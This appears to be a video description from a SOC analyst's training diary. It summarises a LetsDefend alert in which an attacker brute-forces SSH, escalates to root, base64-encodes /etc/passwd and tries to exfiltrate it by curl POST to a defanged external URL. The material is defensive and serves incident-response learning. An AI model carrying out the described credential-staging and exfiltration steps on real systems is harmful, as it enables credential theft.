Suspicious Base64 Commands SSH Brute Force, Root Escalation & /etc/passwd Exfil | LetsDefend SOC302
Day 115 of Becoming a SOC Analyst — SOC302 Suspicious Base64 Encoding/Decoding Commands Detected (True Positive)
Attacker from 89.187.185.184 brute-forced SSH on Linux host Clark (172.16.20.43), successfully authenticating as analyst before escalating to root via sudo su. The attacker ran getent passwd for user recon, base64-encoded /etc/passwd to /root/Documents/encoded.dat to obfuscate the staged data, then attempted exfiltration via curl POST to hxxp://ukr-net-files-loading-application.ru/upload. No outbound firewall confirmation of successful transfer, but staged file contents confirmed as /etc/passwd — credential harvesting attempt, endpoint contained.
🔬 Analysis Reports
🔍 AbuseIPDB (89.187.185.184) → https://www.abuseipdb.com/check/89.18...
🦠 VirusTotal (exfil URL) → https://www.virustotal.com/gui/url/c7...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
00:00 Day 115 intro
00:25 Alert Details
01:27 Investigation
13:10 Playbook Answers
21:00 5w Log
24:45 Result
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #Base64 #SSHBruteForce #PrivilegeEscalation #DataExfiltration #Linux #IncidentResponse #SIEM #Day115 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity